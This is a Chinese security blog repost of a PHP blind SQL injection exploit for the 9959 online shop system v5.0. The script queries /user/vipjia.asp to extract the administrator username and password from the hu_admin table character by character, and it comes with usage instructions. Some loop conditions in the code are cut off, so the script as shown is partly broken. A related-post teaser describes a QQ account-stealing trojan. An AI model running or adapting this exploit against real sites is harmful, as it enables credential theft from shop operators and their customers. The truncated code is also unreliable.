9959 网店系统 v5.0 Blind SQL injection exploit

  • A+
所属分类:lcx

作者:闷豆、

以下是引用片段:

print_r('
+---------------------------------------------------------------------------+
 9959网店系统 v5.0 Blind SQL injection exploit by mendou
 官方网站:


+---------------------------------------------------------------------------+
');

if ($argc
  print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host id
Example:
php '.$argv[0].' localhost  id
+---------------------------------------------------------------------------+
');
  exit;
}

error_reporting(0);
ini_set('max_execution_time', 0);
$host = $argv[1];
$str = "abcdefghijklmnopqrstuvwxyz0123456789";
$strlen =strlen($str);
$pid = $argv[2];

$n_len = lenstr(adminname); //用户长度
echo "用户长度:".$n_len."rn";
pojie("adminname",$n_len);echo "rn";
$p_len = lenstr(password); //密码长度
echo "密码长度:".$p_len."rn";
pojie("password",$p_len);

function pojie($str1,$len){
    global $host,$strlen,$str,$pid;
    for ($j=1 ; $j
        for ($i=0 ; $i
            $exp =  "%20and%20(select%20top%201%20mid(".$str1.",".$j.",1)%20from%20hu_admin)='".$str[$i]."'";
            $a = file_get_contents('http://'.$host.'/user/vipjia.asp?action=loads&id='.$pid.$exp);
            if (strpos($a,"次")==true){
                echo $str[$i];break;
            }
        }
    }
}

//判断 用户或者密码的长度函数
function lenstr($str){
    global $host,$pid;
    for ($i=1 ; $i
        $exp =  "%20and%20(select%20top%201%20len(".$str.")%20from%20hu_admin)=".$i;
        $a = file_get_contents('http://'.$host.'/user/vipjia.asp?action=loads&id='.$pid.$exp);
        if (strpos($a,"次")==true){
            return $i;
        }
    }
}

?>

文章来源于lcx.cc:9959 网店系统 v5.0 Blind SQL injection exploit

相关推荐: QQ鱼饵病毒:巧妙突破QQ客户端对钓鱼网站拦截

QQ鱼饵病毒:巧妙突破QQ客户端对钓鱼网站拦截 我是小号 (我是小学生) | 2013-09-26 07:30 Seccurity Observer曝光一种新型的QQ盗号病毒我们称之为QQ鱼饵病毒,该病毒巧妙地绕过了QQ客户端对钓鱼网站的拦截,达到盗取用户账号…

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: